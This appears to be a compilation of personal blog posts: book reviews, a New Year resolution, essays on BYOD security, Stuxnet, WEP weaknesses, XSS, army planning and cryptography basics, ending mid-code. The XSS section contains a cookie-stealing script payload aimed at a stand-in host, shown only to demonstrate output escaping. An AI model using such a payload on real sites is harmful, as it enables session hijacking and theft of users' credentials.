Book Review – Snow Crash

Snow Crash

by Neal Stephenson

Snow Crash is an iconic book; some would say a masterpiece. Written around 1990 and published in 1992, it is one of the seminal novels to imagine an emerging plane of existence made possible by a future global computer network, and it could also be thought of as ancestral to The Matrix. That it predicted this future at a time when very few people even owned a computer, and a smaller fraction still had one connected to the rest of the world, is perhaps no great feat, but the way the novel conjured an imagination that so closely resembled what came decades later is impressive.

I only heard about this book in late 2021 and, when I did, I bought it on Kindle, where it sat in my library gathering e-dust. But I'd heard a lot about the metaverse and, what with Facebook's decision to rebadge itself as Meta among other things, I decided to give it a shot.

From the start it sets a high pace and keeps the interest up as it paints a picture of a near-future world in which corporatism seems to have won the war against the nation state. It's set around LA, in a pretty dystopic future blighted by a lack of resources and the ever-present abyss into which anybody could fall if things don't work out.

The metaverse portrayed seems quite primitive (albeit very developed) by today's standards of graphics, and this was something I found intriguing as an example of the true difficulty of imagining our possible futures. The main character is half Black and half Japanese and works as a pizza deliverer in a world where the stakes for not delivering a pizza on time are probably painful and possibly terminal. Enter the skateboarding courier who saves his bacon when he looks set to miss his deadline. From there the book hurtles into an exciting and enthralling storyline which follows the well-worn path of increasing stakes and increasing jeopardy. I'll avoid giving too much away by going into any more detail.

Overall, this book was an enjoyable read. It served up an exciting and riveting story set in a fascinating world, technological marvel and brutish reality counterpoised in equal measure. I have to say, however, it didn't reach the highs I've experienced with books I really didn't want to stop reading until I'd got to the end; the story delivered enough, but not much more than that. That said, the overall impression was of a well-crafted tale suspended around curious characters and set in a memorable world. For me it's highly recommended and I'd give it 3.5/5 stars.

BYOD Policy, Risks & Strategies

The defining characteristic of any technological artefact is its utility. For information networks, utility is almost synonymous with flexibility and, indeed, somewhat antithetical to security. Against this, the notion of Bring Your Own Device (BYOD) creates a push-pull: a push towards greater utility via ANY device, and a pull demanding policy constraints in the name of security. In opening a network to any device, which is essentially what BYOD means, we balance these contending priorities by judiciously redefining where our trust boundaries1 lie and then pivoting to an adaptive posture with the capability to flex when needed.

To facilitate this examination, let's consider two very different BYOD use cases: the classroom and the office. In the classroom, BYOD democratises value and enhances inclusivity; in the office, it amplifies productivity and facilitates agility. Each use case demonstrates a different resultant in the trade-off between the contending arenas of the people, process and technology trilemma presented in Palanisamy et al.2,3

Looking first at the classroom: as alluded to previously, the calculus of threat adopts a specific posture in response to the gamut of socio-technical factors at play, such as the ages, capabilities and ideology of the people, the rigour of overarching process and the limitations of the technology. It must also be noted that the worst credible outcome in this environment is reasonably limited in scope. It is reasonable to conclude that the desire to afford students a level and inclusive playing field, in terms of the gains BYOD brings to their educational experience, moves the needle towards less rigour and more openness.

Conversely, in a corporate environment, the demands in terms of policy, education and process are likely to be significantly more restrictive. Indeed, as described in Belanger et al.,4 they tend to dissuade the user from enjoying the additional facility BYOD can provide, owing to concerns about self-efficacy.5 Users' ability to bring a device that meets a narrower definition of acceptable hardware and software presents a further challenge. In this situation the stakes are higher and the worst credible outcome more forbidding, whilst the people are likely to be more compliant with policy and receptive to education, and the technology more restrictive.

Looking a little more closely at the realm of technical challenges to BYOD, we must focus first on the temporal nature of a threat surface. Keeping devices updated is fundamental to a coherent and effective security policy, and the threats to which a failure to do so exposes resources manifest in two ways. First, the timely and regular patching of all software in use on our devices is essential to attain and retain a protected threat surface. Vulnerabilities are discovered all the time and, unless software is patched with fixes as they are developed and promulgated, simply standing still subjects a device to an ever-growing pool of potential exploits. Indeed, the vulnerability to an exploit becomes amplified once the exploit has been discovered, announced and patched. Second, the generational nature of hardware means that step-changes in hardware are typically accompanied by step-changes in the software which runs on it. Practically, this can mean that devices built on obsolete hardware are simply incapable of running software which is being kept up to date.

In addition to this issue, the sheer number of new models appearing in common use has grown enormously and continues to grow. Palanisamy et al.2 state that "Today, employees and their mobile devices are inseparable and very much part of their daily lives." The proliferation of devices and use cases makes it more challenging to negotiate policy space such that processes can cover most, if not all, of the devices which may appear on site. Most BYOD devices are wireless, but not all, and this too presents further complexity.

Looking next at the practice of password management: effective password management governed by stringent policies, forcing users into restrictive practices of renewal and complexity, is superficially sound, but Zhang, Monrose et al.6 demonstrate that the argument is far more nuanced than most discourse reflects. They call into question the continued use of expiration and complexity requirements and, in the longer term, provide evidence to support a move away from passwords altogether. Given, however, that passwords will remain a component of our defence in depth for quite some time yet, the necessity of coordinating these requirements with the weaker behaviours typically observed when users manage their own devices becomes stark.

Logging, described in7 as an integral piece of the jigsaw of defence in depth and likely to be barely used on BYOD devices, is also worth consideration. In a network comprised of corporate hosts under comprehensive management, logging of events to a central repository is highly recommended, but achieving a comparable level of accounting for BYOD presents a significant challenge. Fortunately, off-the-shelf solutions exist for mobile device management (MDM) and mobile application management (MAM). Such services, e.g. Microsoft Intune8, provide an overarching technological and policy framework to ensure that rigour is applied to a BYOD network without the need for a piecemeal approach. Specific to the considerations above, they make the access of BYOD devices contingent upon running an approved combination of hardware and software, and ensure that password policy is applied without exception. Furthermore, by maintaining a record of connected devices and enhanced logging over many aspects of their activity, the lack of logging is addressed in a way which ties activity tightly to the host. Such a system, however, is itself at the mercy of its own patching currency and can, if allowed to lapse, present new vulnerabilities.
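To make the idea concrete, a compliance gate of this kind boils down to checking device attributes against policy before access is granted. The sketch below is illustrative only; the attribute names and policy values are invented for the example and bear no relation to Intune's actual schema:

```python
# A minimal sketch of an MDM-style compliance gate. Attribute names and
# policy values are hypothetical, chosen purely for illustration.
MIN_OS = (14, 0)
APPROVED_MODELS = {"Pixel 7", "iPhone 14", "ThinkPad X1"}

def is_compliant(device: dict) -> bool:
    """Return True only if the device meets every policy requirement."""
    checks = [
        tuple(device.get("os_version", (0, 0))) >= MIN_OS,  # patched OS
        device.get("model") in APPROVED_MODELS,             # approved hardware
        device.get("encrypted", False),                     # storage encryption on
        device.get("passcode_set", False),                  # password policy applied
    ]
    return all(checks)

device = {"model": "Pixel 7", "os_version": (14, 1),
          "encrypted": True, "passcode_set": True}
print(is_compliant(device))  # True
```

A real MDM evaluates far richer signals (jailbreak detection, certificate state, app inventory), but the shape is the same: access is the conjunction of policy checks, and a single failing check quarantines the device.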


  1. Shostack, A. (2014) Threat modeling. 1st ed. Indianapolis: Wiley.
  2. Palanisamy, R., Norman, A.A. and Mat Kiah, M.L. (2020) ‘BYOD Policy Compliance: Risks and Strategies in Organizations’, The Journal of computer information systems, pp. 1–12. doi:10.1080/08874417.2019.1703225.
  3. Schlarman, S. (2001) ‘The People, Policy, Technology (PPT) Model: Core Elements of the Security Process’, Information systems security, 10(5), pp. 1–6. doi:10.1201/1086/43315.10.5.20011101/31719.6.
  4. Belanger, F. and Crossler, R.E. (2018) ‘Dealing with digital traces: understanding protective behaviors on mobile devices’, Journal of Strategic Information Systems, 28(1), pp. 34–49. doi:10.1016/j.jsis.2018.11.002.
  5. Bandura, A. (1995) Self-efficacy in changing societies. Cambridge: Cambridge University Press.
  6. Zhang, Y., Monrose, F. and Reiter, M. (2010) ‘The security of modern password expiration’, in Proceedings of the 17th ACM conference on computer and communications security. ACM, pp. 176–186. doi:10.1145/1866307.1866328.
  7. Gilbert, J., Diogenes, Y. and Mazzoli, R. (2016) Enterprise Mobility with App Management, Office 365, and Threat Mitigation: Beyond BYOD. Pearson Education.
  8. Microsoft (2021) Microsoft Intune is an MDM and MAM provider for your devices. Available at: (Accessed: 2 December 2021).

Book Review – The Fourth Turning

The Fourth Turning: What the Cycles of History Tell Us about America’s Next Rendezvous with Destiny

by William Strauss and Neil Howe

So for week one I cheated a little, as I'd been reading this book since November, but I make no apologies for that. It's a book with its own website ( and one I found out about whilst watching a YouTube video ( featuring Raoul Pal and Robert Breedlove. The video is powerful in its own right and one I recommend you watch; as for the book, it did not fail to impress, although not as much as I'd hoped it would.

The premise of the book is that the human race, demographically and socially, exists to a meta-level cyclical beat, and that this beat, which repeats every 80–100 years and is known as a saeculum among other things, contains the four generations of the human lifecycle. Indeed, it carries THE four generations of the human lifecycle: pueritia, iuventus, virilitas and senectus.

The book presents a fascinating description of the history of humanity against this context, going back to late medieval times, and does so quite persuasively. In doing so it categorises the generations of human society within a saeculum into four archetypes, namely prophet, nomad, hero and artist. It also defines the four parts of a saeculum as the societal high, the awakening, the unravelling and the crisis.

There is much about this book that is speculative; indeed, at times it felt a bit like reading a horoscope. But the underlying premise is fascinating and has merit. Whilst the speculation detracted from the book somewhat, and it could probably have been written in 60% of the word count, I'd recommend it at 3.5 out of 5.

Happy New Year 2022

So it's 2022. Another year gone and a new one already driven off the forecourt. A new year means a new start, and so we typically resolve to do things differently at this watershed moment with a resolution. I'm old enough now to know the pattern of behaviour I usually demonstrate with this act, and it's rarely a successful one. The best-laid plans of mice and men… But last year I succeeded: I resolved to remove the booze from my life for the full year whilst getting fit by dropping my BMI from over 35 to under 25, and thankfully I managed both.

So, fresh from the end-of-year splurge, newly invigorated and a little heavier again, I've made a new resolution. It builds upon the success of last year, although I'll need a couple of weeks to undo the splurge, and this year the theme is to S T R E T C H myself.

I feel like my weight/fitness issue is thankfully now under control so, by way of capitalising on my new fitness, I want to move on to the next phase and stretch my mind as well as my body.

A few years ago I read nearly a hundred books in a year. My goal was to hit the hundred and I fell short, but it was truly a wonderful experience for mind, body and soul. I've always been aware of the value of books and have always striven to read more than I do; usually that sentiment just results in a persistent guilt that I don't. So this year the target is simple: read one book per week, every week, and to keep me honest I'll write a review of each book here on my blog.

Secondly, another area I've known I should do better in is physical stretching. I've simply never really done it at all, apart perhaps grudgingly at the start of a run because everybody around me was doing it. So again, this year I resolve to stretch once a day and maybe throw in some floor exercises if the mood takes me. I'll blog about that too, although perhaps a bit less regularly.

So there it is. A commitment in digital black and white. Watch this space for progress and growth.

PS. You can also find me on Goodreads at

Stuxnet: The Cyber Cruise Missile

The Internet was developed as a military system first and foremost and, as is often the case, the utility it has more recently afforded peacetime humanity is only a fringe benefit. The decision by Israel, therefore, with at the very least the tacit support of the United States, to develop offensive malware, whilst appearing on the face of it to be a watershed moment in the militarisation of the Internet, was actually the continuation of a long-embedded trend line. The fact is, there was no Rubicon to cross, and the trajectory of modern warfare will continue into cyberspace with increasing speed.

Against this backdrop, then, the development of Stuxnet appears to have been the starting pistol of a new arms race in the field of cyberweapons. This field, however, is largely invisible and, as a result, immune to the clamour for regulation that would accompany such a step change in real-world military technology under normal circumstances. Although it happened a decade ago, there is still no international treaty to limit the damage that can be brought to bear by a small fragment of computer code upon an entire country's telecoms, banking or energy infrastructure. The recent Colonial Pipeline event in the eastern United States will have left the West in no doubt that it is in everybody's interests to push for one before the tables are further turned and more chaos is wrought upon society.

Stuxnet was developed with a single purpose in mind. Its level of complexity implies that it could only have been brought into existence by a nation state but, for all its finesse, the deliberate network isolation of the plant at Natanz (the uranium enrichment facility in Iran which was its intended target) meant that it still had to be carried in by hand and delivered manually. It is almost certainly a measure of the chaotic picture at Natanz following its delivery that the malware eventually made it back out into the wild and infected thousands upon thousands of systems worldwide.

The victims of the Stuxnet attack were ostensibly the Iranians but, as described already, there have been thousands of others in the intervening time since its release. This is the rub. It is extremely challenging for the creators of these nefarious programs to stop them after they have done what was intended and indeed the very creation of mechanisms to do this runs counter to their intended purpose in the first place.

The target of Stuxnet was an ICS (Industrial Control System). Such systems, often somewhat obsolete and less well architected to cope with malware than more mainstream enterprise systems, control our critical infrastructure: energy, transport, telecoms and industrial networks. These enormous networks, known collectively as operational technology as opposed to information technology, fulfil a unique role in modern life, and their disruption can be catastrophic, with consequences up to and including massive loss of human life.

Stuxnet is a variety of malware known as a worm. It was first discovered by a security contractor in June 2010 and quickly became an almost household name due to the news coverage it attracted. Analysis of the source reveals that it was developed specifically to target the SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems used by Iranian nuclear R&D. It operated by attacking an MS Windows application used to control Siemens-built uranium enrichment centrifuges, using the following five vulnerabilities:

  • MS08-067 – RPC vulnerability: allowed a remote user rights equal to those of a local user
  • MS10-046 – LNK vulnerability: allowed remote insertion of malware
  • MS10-061 – Print Spooler vulnerability: allowed a malicious print request to take control of a server
  • MS10-073 – Win32k.sys vulnerability: allowed elevation of privilege to kernel level
  • CVE-2010-2772 – Siemens SIMATIC WinCC default password vulnerability: use of a known default password to access the system

Ultimately Stuxnet was successful in achieving its end goals, but it also achieved far more than that: it attracted a lot of unwelcome publicity and ratcheted up the stakes in the business of cyberwarfare. One supposes that, had it not come along, another candidate would have, but it is certain that Stuxnet changed the face of critical infrastructure cyberespionage forever, and there is no going back.

Old Hacks, New Pain

The video referenced here is about ten years old, but the techniques described are evergreen. Wi-Fi man-in-the-middle attacks, web-based client-side injection attacks, USB flash drive malware and RFID attacks are all well-known attack vectors in the security community but, as we'll go on to discuss, whilst many of the challenges demonstrated in the video have been addressed, many also remain.
Let's take a look at each of these now in a little more detail.

Wireless Man In The Middle

Before the advent of ubiquitous free public Wi-Fi, wireless networks were primarily to be found in private locations such as homes and offices. Back then, a practice called wardriving (the ugly stepchild of wardialling) was the best way to get up to no good. Practitioners would assemble a toolkit of laptop, battery, amplifiers and fancy high-gain antennas and head to the vicinity of these networks, where they would snoop the traffic and look for opportunities for mischief. Nowadays, all a miscreant needs to do is buy a coffee, plonk themselves down in the corner and wait.

Ten years ago, WEP (Wired Equivalent Privacy) was still in quite widespread use and was woefully vulnerable to attack. With WEP, each packet is encrypted with a cipher stream generated by a 64-bit RC4 key. (RC4, the Rivest Cipher 4 stream cipher, has since had multiple vulnerabilities discovered in it, rendering it insecure.) The key is made up of a 24-bit IV (initialisation vector) and a 40-bit WEP key, and the encrypted packet is generated by bitwise modulo-2 addition (XOR) of the plaintext and the RC4 cipher stream.
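For the curious, the scheme just described can be sketched in a few lines of Python (RC4 implemented from its published description; the 24-bit IV is prepended to the 40-bit key to seed the per-packet cipher stream):

```python
def rc4_keystream(key: bytes, n: int) -> bytes:
    """Generate n bytes of RC4 keystream from the given key (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = [], 0, 0
    for _ in range(n):                        # pseudo-random generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

iv = bytes([0x01, 0x02, 0x03])                # 24-bit IV, sent in the clear
wep_key = bytes([0xAA] * 5)                   # 40-bit shared WEP key
plaintext = b"hello, wireless world"
keystream = rc4_keystream(iv + wep_key, len(plaintext))
ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))

# Decryption is the same XOR with the same IV + key
recovered = bytes(c ^ k for c, k in
                  zip(ciphertext, rc4_keystream(iv + wep_key, len(ciphertext))))
print(recovered == plaintext)  # True
```

(This is a didactic sketch, not the full 802.11 frame format: real WEP also appends a CRC-32 integrity value before encryption, which has its own well-documented weaknesses.)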

WEP Weakness

The fact is, unless a protocol compels good key management practices, they will not happen. Poor-quality and long-lived keys can and most certainly do exist in WEP implementations, and most WEP networks had a single WEP key shared between every host on the network. Everything on the network needed to hold the key in some form and, since changing keys was tedious and burdensome, keys were rarely changed. Furthermore, a key size of 40 bits was a weakness in and of itself: 40 bits may have been acceptable in the late 90s, but nowadays it's not enough.

In addition to the key management issues, the system was designed with an initialisation vector that is too small. At 24 bits, a given WEP key only allows for 16,777,216 different RC4 cipher streams, which becomes a problem if IVs are reused. And they are: the specification does not define how the IV is to be chosen, and so reuse can become a significant problem.
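The consequence of IV reuse is easy to demonstrate without any cipher machinery at all: XOR two ciphertexts produced under the same cipher stream and the stream cancels out, leaving the XOR of the two plaintexts for an analyst to pick apart:

```python
import os

p1 = b"attack at dawn!!"
p2 = b"retreat at dusk!"
keystream = os.urandom(len(p1))          # stands in for a reused RC4 stream

c1 = bytes(a ^ b for a, b in zip(p1, keystream))
c2 = bytes(a ^ b for a, b in zip(p2, keystream))

# XOR of the two ciphertexts: the keystream cancels out entirely
xored = bytes(a ^ b for a, b in zip(c1, c2))
print(xored == bytes(a ^ b for a, b in zip(p1, p2)))  # True
```

Given p1 XOR p2 and any guessable fragment of one plaintext, the corresponding fragment of the other falls out immediately, which is exactly why a 24-bit IV space was never going to be enough.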

In summary, then, WEP has significant design flaws and vulnerabilities.

Client-Side Injection Attacks

Client-side injection attacks are essentially a form of content spoofing which tricks a user into believing that certain content on a site is a legitimate part of the web page rather than inserted from another source.

Otherwise known as XSS (cross-site scripting), these attacks allow an attacker to execute JavaScript in the target web browser, which can be used to hijack sessions, modify sites, insert further insecure content or take over the target browser. Any web application framework is vulnerable to this type of attack if the website and associated code are constructed poorly. The attacks typically use JavaScript, but HTML can also be used, as can a number of other client-side technologies such as VBScript, ActiveX, Java or even Flash. The only prerequisite for the scripting language used is that it is supported by the browser.

XSS attacks typically come in one of two forms: persistent or non-persistent. Persistent XSS attacks add malicious code to the site itself, for example as links in forum posts, emails in webmail clients or even chat conversations within browsers. Non-persistent attacks require the user to click a link that has been modified with code which, when clicked, is executed in the client browser.
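The standard defence, whatever the framework, is to treat user-supplied data as text rather than markup by escaping it on output. Python's standard library illustrates the idea (the payload URL here is made up for the example):

```python
import html

# A classic cookie-stealing payload; the domain is purely illustrative.
user_input = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Escaping on output turns markup metacharacters into inert entities,
# so the browser renders the payload as text instead of executing it.
safe = html.escape(user_input)
print(safe)
```

Real applications layer this with context-aware templating, input validation and a Content-Security-Policy header, but output escaping is the load-bearing wall.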

Thumb drive trojans

Thankfully we have moved on from the days when operating systems like Windows XP would "autorun" code on a thumb drive simply by virtue of its being plugged in. The latest operating systems avoid doing this because of the security threat it presents. Nevertheless, unknown USB drives can contain malware which, when run, can infect the operating system with ransomware or worse. Furthermore, even non-executable files, which typically attract less scrutiny than executables, can contain malware which launches simply on opening the file.



File Carving With Machine Learning

In the world of digital forensics, "file carving" is the act of recovering deleted files from fragments, whether left behind on a fragmented hard drive or as by-products of a partial overwrite of a disk sector, in the absence of the metadata the filesystem would ordinarily use to make the file available.
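At its simplest, carving means scanning raw bytes for known file signatures ("magic numbers") rather than consulting filesystem metadata. A toy sketch for JPEG files, which begin FF D8 FF and end FF D9:

```python
def carve_jpegs(raw: bytes) -> list[bytes]:
    """Recover JPEG candidates from a raw byte stream by signature alone."""
    SOI, EOI = b"\xff\xd8\xff", b"\xff\xd9"   # start/end-of-image markers
    found, pos = [], 0
    while (start := raw.find(SOI, pos)) != -1:
        end = raw.find(EOI, start + len(SOI))
        if end == -1:
            break                              # truncated fragment: stop
        found.append(raw[start:end + len(EOI)])
        pos = end + len(EOI)
    return found

# A fake disk image: junk, a tiny JPEG-like blob, more junk
image = b"\x00" * 32 + b"\xff\xd8\xff\xe0JFIFdata\xff\xd9" + b"\x00" * 32
print(len(carve_jpegs(image)))  # 1
```

Production carvers are far cleverer, handling fragmentation and false-positive markers, and the machine learning angle is to classify ambiguous fragments by their statistical fingerprint rather than by signature alone.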

The Army Poses 7 Questions – Can Business Try It?

One of the fundamentals of the doctrinal training of commanders in the British Army is what is known as the Combat Estimate. The Combat Estimate, when applied to a situation, provides a systematic mechanism with which to shake out a plan in response to a situation framed within a given set of requirements. The application of its seven questions as a planning tool ensures that all of the influencing factors pertinent to a situation are built into a plan which seeks to secure a given aim. That aim can be the storming of a well-defended bunker, the destruction of an enemy fuel depot or indeed the organisation of a trip to the Alps to teach a group to ski. As is often the case with military doctrine, it is as applicable to a civilian situation as to a military one. Its value lies in its ability to systematically break down a complex environment in such a way as to methodically define the important influencing elements relevant to a particular aim. One may imagine that such martial thoroughness would be well placed in the business boardroom, and one would be correct.

The Combat Estimate (the 7 Questions) is one of three methods the British Army uses to parse complex sets of circumstances for systematic analysis; the other two are the Operational Estimate and the Tactical Estimate. Of the three, the Combat Estimate really comes into its own where quick planning is required which seeks to gain and maintain a high-tempo adversarial advantage. It is therefore best applied at the tactical and operational level. Let's look at the questions in turn:

  1. What is the adversary doing and why, and/or what situation do I face and why, and what effect do they have on me? This is a bit of a mouthful, but it effectively requires examination of the broad constraints which will hamper one's ability to complete an objective. The key takeaway from this question is "assess and prioritise": what is happening, and how does it fit into my priorities?
  2. What have I been told to do and why? It's essential to have a detailed understanding of the rationale behind what makes this task something that needs to be done. An ability to put oneself into the shoes of those in authority, whether that is your supervisor and their supervisor, or indeed the broader needs of the organisation or company on whose behalf you are acting, is also beneficial. Are your actions part of a larger master plan? It's essential to build up this broader picture, not only to understand how your task fits into other efforts but also to understand its priority, its dependencies and antecedents and, more interestingly, what support you may be able to expect as you define interested parties more broadly. This information is a key component in the manager's toolbox and in their ability to motivate those involved in accomplishing the task.
  3. What effects do I need to have on the adversary or situation, and what direction must I give to develop the plan? It is essential that you clearly understand your task and the intermediate key staging points which lead to its achievement. This is not only for your own clarity of purpose but also, perhaps more importantly, as the basis of your ability to direct others in the execution of your plan. A clear and well-structured definition of your aim ensures that you maintain your own focus, not to mention that you are well able to articulate it to others within your purview, which results, one hopes, in their taking ownership of the task.
  4. Where and how can I best accomplish each action or effect? It is important to understand the situation thoroughly through the application of the previous questions and their outputs. At this stage one seeks to identify key resources, their priority and how to maintain control of them. It also begins to be possible to identify some lower level courses of action which will serve to consolidate into the broader strategy. A thorough examination of this question should produce a prioritisation of component parts of the overall strategy as well as an outline of the steps necessary to achieve each of them.
  5. What resources are needed to accomplish each action or effect? At this stage a planner, armed with the structured output of question 4, can begin to examine the resource requirements of each strand of the broader plan. The earlier prioritisation assists in the allocation of resource where contention exists, ensuring that resource, whether manpower or equipment, is distributed most efficiently. It also becomes clear at this stage whether it is necessary to request further resources as a prerequisite for the plan's success. This question reaches both up and down your own command chain to ensure that the correct organisational capability is allocated. It is also the ideal time to revisit the output of question 2 and ensure that efforts and requirements are properly matched.
  6. When and where do the actions take place in relation to each other? It is important at this stage to develop one's understanding of the temporal dimension of the plan. In a military environment this ensures that, where potential exists for conflict in the achievement of each effect, it is dealt with. In the boardroom, it enables individual strands of a broader planning structure to avoid duplication of effort, or indeed the need to revisit certain actions. A useful tool at this stage is a timeline/sync matrix, which provides a visual representation of the dependencies and outputs of each component part; a simple chart in the style of a Gantt chart works well.
  7. What control measures do I need to impose? This question helps to define the boundaries of the plan as well as delineate roles and responsibilities at a more granular level within the broader effort. By carefully examining this area, we ensure that each component part of the plan is equipped with the correct definition but also has sufficient scope of manoeuvre to respond flexibly to emergent conditions whilst keeping an eye on the end goal. By allocating an appropriate amount of responsibility, one ensures that members of a team are able to utilise their own abilities to maximum effect without having their latitude stifled through unnecessary micro-management. In a business environment it is also important to maintain awareness of budgetary limitations or cut-off dates.

The seven questions described above represent the systematic mechanism by which the military ensures that no facet of the overall planning landscape is overlooked. In military situations such thoroughness is rewarded by minimising loss of life, so it is clearly warranted; business, too, can benefit from such a structured approach to secure the success of individual objectives up and down the chain of command. Throughout history, civilian activity has embraced elements of military doctrine and procedure and will no doubt continue to do so. Penalties in the business world thankfully very rarely extend to loss of life but, where one seeks to do the best job possible with the resources available, and in turn to minimise the chances of failure and their knock-on effects, such thorough frameworks can clearly bring a great deal of value. Their application, however piecemeal, would seem a natural boon to the development of successful business practice in any field of operation.

Thanks for reading this post. It has been my pleasure to write it and I’d most certainly appreciate your feedback either by commenting on it in the comments section of my blog below or in the comments section on the platform you used to find it. I hope you also find some of my other posts on my blog of interest and am always happy to engage in discussion either online or offline in the development of these ideas. Happy planning.

Cryptography Fundamentals

In this post I'll take a very brief and broad look at some of the core principles and fundamental aspects of cryptography. As a practice it has been around for as long as humanity itself, but as a science its history is more recent, spanning a few decades at most. It will come as no surprise that the growth of the Internet, or perhaps more accurately of data communications, which predates the Internet by a decade or three, has been one of the main drivers of the growing need for cryptography. The prevalence and penetration of the Internet has now reached such levels that there is barely a business in the developed world that does not rely upon effective encryption for its survival.

So, this post is about security and the role played by cryptographic technology in data security. It's a bare introduction, but I hope to add links to some blog posts which examine the more important areas more deeply, so look out for them. The ability to secure data, in storage or in transit, against unauthorised compromising access is now a critical function of information technology. Indeed, all forms of e-commerce, such as credit card processing, equities trading or general banking data processing, would, if compromised, cost the unfortunate organisations billions of dollars/pounds/whatever, not to mention the devastating cost in destroyed confidence going forward.

So let's look at a few high-level topics to get going.

Information Theory

The fundamentals of information theory were famously defined by none other than the father of the information age, Claude Shannon, in his seminal 1948 work, A Mathematical Theory of Communication. In this paper he defines the problem to which information theory purports to be the solution, and proves many mathematical results besides. More importantly, his work acted as a foundation upon which, time after time, the foremost minds of our science have expanded, giving us the mature and usable communications mathematics we have today. Shannon's paper did not come a moment too soon: this was an age in which the atomic bomb had just been developed, we were still a decade from the polio vaccine and Sputnik, and, most pertinently, transistors were only just beginning to replace vacuum tubes in the design of digital machines (in fact, this too is partly thanks to Shannon). Information theory gave engineers, mathematicians and scientists the tools they needed to analyse how well their machines were transmitting data to and from one another.

Figure 1 above details Shannon's communication model. The information source produces a message. The transmitter creates the signal to be transmitted through a channel; the channel is the medium carrying the signal. The receiver accepts the signal from the channel and converts it back into the original message. The destination is the intended recipient of the message. The noise source introduces errors during transmission; it interferes with the signal, distorting it and corrupting the transmitted message. Cryptography uses the same model. Shannon also discussed two other basic concepts in his paper: confusion and diffusion. We'll look at these in more detail below.

In his paper, Shannon also explained that the statistical frequencies of repetition in the cipher-text (encrypted text) and the key (usually a string of numbers or letters stored in a file which, when processed through a cryptographic algorithm, can encode or decode data) should be as low as possible. In other words, they should appear as random as possible, exhibiting no discernible patterns. This is what he meant by confusion. Looking at the key again, if a small part of the key is changed, this should have a widespread knock-on effect, changing the cipher-text throughout its scope. This is what he meant by diffusion. Without sufficient confusion and diffusion, it is possible to deduce the key by analysing the original plaintext alongside the corresponding cipher-text.


Entropy

Entropy is defined in the dictionary as a lack of order or predictability, or as a gradual decline into disorder. In cryptography it represents the amount of randomness in a transmission. A cryptographic algorithm should produce cipher-text with as much entropy as possible in order to hide the original plaintext from anybody who might examine the corresponding cipher-text. Plaintext transmissions contain order that can be discerned by an observer even if they do not understand the language being used, and it is this order that leads to an ultimate understanding, whether the target is a language to be decoded or an encrypted stream of text. Thus, discernible order is the enemy of encryption, and entropy is to be encouraged.
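To make this concrete, here is a minimal sketch in Python of the classic Shannon entropy estimate applied to a byte string. The function name `shannon_entropy` is my own choice for illustration; the formula is Shannon's standard one, giving bits of entropy per byte based on observed byte frequencies.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Estimate bits of entropy per byte from the byte frequencies."""
    counts = Counter(data)
    total = len(data)
    return sum(-(n / total) * math.log2(n / total) for n in counts.values())

# A perfectly ordered message has no entropy at all
print(shannon_entropy(b"aaaaaaaa"))        # 0.0

# A string where every byte value appears equally often maximises it
print(shannon_entropy(bytes(range(256))))  # 8.0
```

Good cipher-text should score close to the maximum of 8 bits per byte, whereas English plaintext typically scores far lower; that gap is the "discernible order" an attacker exploits.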

Random number generation

Randomness is essential for effective encryption, and you may be surprised to learn that a computer cannot easily generate it. Everything a computer does is under the instruction of an underlying process or algorithm, and it is for this reason that generating randomness is a significant challenge. This may come as no surprise to the lay reader, since a computer may seem to be the ultimate expression of determinism, but it is worth pausing to consider how one might mechanistically program a function for generating randomness. Of specific relevance to this post, cryptographic processes and algorithms require randomness to be secure: random numbers are needed for key distribution, session key generation, generating keys for cryptographic algorithms, and the generation of bit streams and initialisation vectors (IVs).

For computers to generate random numbers, they must capitalise on sources of randomness and unpredictability. Shannon posited that randomness requires two important components: a uniform distribution and independence. In a uniform distribution, zeros and ones occur equally often. Independence means that no bit can be inferred from the others. Unpredictability is also required: each number must be statistically independent of the other numbers in the sequence. The random numbers a computer produces are either true random numbers or pseudorandom numbers: randomness can be produced by a true random number generator (TRNG), also known simply as a random number generator (RNG), or by a pseudorandom number generator (PRNG).

As stated previously, deterministic computers cannot generate random numbers, at least not without external assistance. A TRNG must therefore use an external, non-deterministic source of entropy together with some function designed to take the randomness provided externally and distil it into a suitable random number (the entropy distillation process). The input is typically a source of entropy from the physical environment, such as keystroke timing patterns, disk electrical activity or mouse movements; this source is combined with the processing function to generate random output in the form required.
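The PRNG/TRNG distinction shows up directly in Python's standard library, and a short sketch makes the difference tangible: the `random` module is a seeded PRNG (reproducible, so never for keys), while the `secrets` module draws on the operating system's entropy pool and is the appropriate choice for cryptographic material.

```python
import random
import secrets

# PRNG: fully determined by its seed -- fine for simulations, NOT for keys.
random.seed(42)
run_one = random.randbytes(16)
random.seed(42)
run_two = random.randbytes(16)
assert run_one == run_two  # same seed, identical "random" output

# CSPRNG: secrets draws on OS entropy sources (keystrokes, interrupts, etc.)
key = secrets.token_bytes(16)  # e.g. a 128-bit session key
iv = secrets.token_bytes(16)   # e.g. an initialisation vector

print(run_one.hex())
print(key.hex())
```

The reproducibility assertion above is exactly why a seeded PRNG is dangerous in cryptography: an attacker who learns (or guesses) the seed can regenerate every key derived from it.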


Freshness

In order to understand the concept of freshness properly, it is illuminating to first examine the replay attack. In a replay attack, an attacker records the network traffic involved in logging in to a system, then plays the recording back, effectively resending what had been sent before, to gain access for themselves, even though the recorded traffic may have been hashed or obfuscated.

The notion of freshness is something of an abstraction, which tends to make it less than intuitive, but it effectively means ensuring that each time we transact with a system in order to access it, the interaction traffic is never the same as it was before. Now, in a world where we don't want to change our passwords every time we log off, that sounds like a challenge, but it is not too great a one.

The way it is achieved is for the server to generate a one-time pseudorandom number which is sent to the client at the start of the authentication exchange. This number, which will only ever be used once (hence the abbreviation nonce), is typically concatenated with the password before transmission to the server, making it impossible to anticipate the required transmission and so to complete a replay attack.
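A toy sketch of that challenge-response exchange, with function names of my own invention, might look as follows. Note this is deliberately simplified: a real system would not hold plaintext passwords server-side, and would use a salted, slow password hash rather than bare SHA-256.

```python
import hashlib
import secrets

def server_issue_nonce() -> bytes:
    # One-time pseudorandom challenge; a fresh one is issued per login attempt
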